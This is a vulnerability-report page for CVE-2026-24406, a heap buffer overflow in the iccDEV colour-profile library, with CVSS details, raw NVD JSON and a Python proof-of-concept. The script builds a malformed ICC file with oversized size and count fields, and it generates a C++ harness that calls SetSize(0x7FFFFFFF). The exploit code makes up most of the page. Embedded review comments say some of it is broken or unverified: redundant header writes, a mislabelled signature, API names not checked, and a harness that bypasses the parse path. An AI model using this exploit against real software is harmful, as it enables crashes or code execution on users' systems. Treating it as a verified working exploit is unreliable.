Security Vulnerability Report
CVE-2026-24406 CVSS 8.8 HIGH

CVE-2026-24406

Published: 2026-01-24 01:15:51
Last Modified: 2026-01-30 18:24:36

Description

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to cause a denial of service, manipulate data, bypass application logic, or achieve code execution. This issue has been fixed in version 2.3.1.2.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''
CVE-2026-24406 PoC - iccDEV CIccTagNamedColor2 Heap Buffer Overflow

This PoC demonstrates the heap buffer overflow vulnerability in
CIccTagNamedColor2::SetSize()

Author: Security Research
Reference: https://github.com/InternationalColorConsortium/iccDEV/commit/90c71cba2c563b1f5dc84197f827540d1baaea67

NOTE(review): this script only *writes* two artifacts (a crafted .icc file
and a C++ harness source) to the current directory; it does not load or
parse anything itself. Whether the harness compiles or the crafted file is
accepted by iccDEV's loader is not established by anything in this script.
'''
import struct
import os  # NOTE(review): imported but never used in this script


def create_malicious_icc_profile() -> bytes:
    """
    Create a malicious ICC profile that triggers heap buffer overflow in
    CIccTagNamedColor2::SetSize() function

    Returns:
        bytes: a 128-byte header, a 4-byte tag count, one 12-byte tag-table
        entry and 1084 bytes of tag data (1228 bytes in total as written).
        Bytes 0..3 of the header hold the total length; every other header
        byte is left as zero.
    """
    # ICC Profile Header (128 bytes)
    header = bytearray(128)
    # NOTE(review): bytes 0..3 are overwritten twice below (first with
    # 0x61636370, then with the final profile length), so this write and the
    # next one have no effect on the returned bytes.
    header[0:4] = b'iccp'  # Profile signature
    struct.pack_into('>I', header, 0, 0x61636370)  # 'accp' - profile size placeholder

    # Tag table with CIccTagNamedColor2
    # Tag signature for 'ncl2' (NamedColor2)
    tag_signature = b'ncl2'
    # 128 (header) + 4 (tag count) + 12 (one tag entry) = 144, which is where
    # malicious_data lands in the assembly below, so the offset is consistent.
    tag_offset = 128 + 4 + 12  # After header and tag count
    # NOTE(review): the declared tag size (0xFFFFFFFF) far exceeds the 1084
    # bytes actually appended. A parser that trusts this field without
    # checking it against the real file length is the CWE-20 / CWE-122 class
    # of defect the advisory describes; a hardened loader should reject it.
    tag_size = 0xFFFFFFFF  # Malicious oversized size to trigger overflow

    # Build tag table
    tag_count = struct.pack('>I', 1)
    tag_entry = tag_signature + struct.pack('>I', tag_offset) + struct.pack('>I', tag_size)

    # Malicious CIccTagNamedColor2 data
    # Crafted data that causes heap overflow when SetSize() processes it
    malicious_data = bytearray()
    malicious_data += b'ncl2'  # Type signature
    malicious_data += struct.pack('>I', 0)  # Reserved
    # NOTE(review): this count field is the same value the C harness below
    # passes directly to SetSize(); the script does not show which of the two
    # paths the library actually uses.
    malicious_data += struct.pack('>I', 0x7FFFFFFF)  # Count - oversized
    # NOTE(review): the field labels on the next two lines are the author's;
    # they are not verified against the ncl2 tag layout here.
    malicious_data += b'A' * 16  # Vendor flag
    malicious_data += b'B' * 32  # Profile description

    # Fill with controllable data for heap exploitation
    malicious_data += b'\x41' * 1024  # Padding for overflow

    # Assemble the profile
    icc_profile = bytearray()
    icc_profile += header
    icc_profile += tag_count
    icc_profile += tag_entry
    icc_profile += malicious_data

    # Update profile size in header
    struct.pack_into('>I', icc_profile, 0, len(icc_profile))

    return bytes(icc_profile)


def create_poc_source() -> str:
    """
    Generate C/C++ PoC code that triggers the vulnerability

    Returns:
        str: the C++ harness source as a single string; nothing is compiled
        or executed here.

    NOTE(review): the harness calls SetSize(0x7FFFFFFF) directly with a
    hard-coded argument after FindTag(), independently of whatever the parser
    did with the crafted file. That demonstrates only that the method mishandles
    a large argument, not that untrusted profile data reaches it through the
    parse path; a regression test for the fix should go through Parse() alone.
    The CIccFile / Parse / FindTag names are reproduced as given in the PoC
    and are not verified against iccDEV's actual API.
    """
    poc_code = '''
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include "icc.h"

// PoC for CVE-2026-24406 - Heap Buffer Overflow in CIccTagNamedColor2::SetSize()
// Vulnerable versions: iccDEV <= 2.3.1.1
// Fixed in version: 2.3.1.2

int main(int argc, char* argv[]) {
    if (argc < 2) {
        printf("Usage: %s <malicious_icc_file>\\n", argv[0]);
        return 1;
    }

    printf("[*] Loading ICC profile: %s\\n", argv[1]);
    printf("[*] CVE-2026-24406 PoC - Heap Buffer Overflow in CIccTagNamedColor2::SetSize()\\n");

    // Load the malicious ICC profile
    CIccFile *pFile = new CIccFile();
    if (!pFile->Load(argv[1])) {
        printf("[-] Failed to load ICC profile\\n");
        delete pFile;
        return 1;
    }

    // Parse the profile - this triggers CIccTagNamedColor2::SetSize()
    CIccProfile *pProfile = new CIccProfile();
    if (!pFile->Parse(pProfile)) {
        printf("[-] Failed to parse ICC profile\\n");
        delete pProfile;
        delete pFile;
        return 1;
    }

    // Access CIccTagNamedColor2 tag which triggers SetSize()
    CIccTag *pTag = pProfile->FindTag("ncl2");
    if (pTag) {
        printf("[+] Found ncl2 tag - triggering SetSize()\\n");

        // Cast to CIccTagNamedColor2 and call SetSize with controlled input
        CIccTagNamedColor2 *pNamedColor = dynamic_cast<CIccTagNamedColor2*>(pTag);
        if (pNamedColor) {
            // This call with malicious size triggers heap buffer overflow
            pNamedColor->SetSize(0x7FFFFFFF);  // Oversized value
            printf("[!] Heap buffer overflow triggered!\\n");
        }
    }

    delete pProfile;
    delete pFile;

    printf("[*] Done\\n");
    return 0;
}
'''
    return poc_code


def main() -> None:
    """
    Write the two PoC artifacts to the current working directory.

    Side effects: creates (or overwrites) 'CVE-2026-24406_malicious.icc' and
    'CVE-2026-24406_poc.cpp' next to wherever the script is run, and prints a
    short progress log. Nothing is compiled or executed.
    """
    print("[*] Generating CVE-2026-24406 PoC artifacts")

    # Generate malicious ICC profile
    malicious_icc = create_malicious_icc_profile()
    with open('CVE-2026-24406_malicious.icc', 'wb') as f:
        f.write(malicious_icc)
    print("[+] Created malicious ICC profile: CVE-2026-24406_malicious.icc")

    # Generate C/C++ PoC source
    poc_source = create_poc_source()
    with open('CVE-2026-24406_poc.cpp', 'w') as f:
        f.write(poc_source)
    print("[+] Created PoC source: CVE-2026-24406_poc.cpp")

    print("\n[*] PoC Generation Complete")
    print("[*] Impact: DoS, Data Manipulation, Code Execution")
    print("[*] Fix: Upgrade to iccDEV >= 2.3.1.2")


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24406", "sourceIdentifier": "[email protected]", "published": "2026-01-24T01:15:51.073", "lastModified": "2026-01-30T18:24:36.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. Las versiones 2.3.1.1 e inferiores tienen una vulnerabilidad de desbordamiento de búfer de montón en CIccTagNamedColor2::SetSize(). Esto ocurre cuando la entrada controlable por el usuario se incorpora de forma insegura en datos de perfil ICC u otros blobs binarios estructurados. La explotación exitosa puede permitir a un atacante realizar DoS, manipular datos, eludir la lógica de la aplicación y la ejecución de código. 
Este problema ha sido solucionado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/90c71cba2c563b1f5dc84197f827540d1baaea67", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/480", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-h9h3-45cm-j95f", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}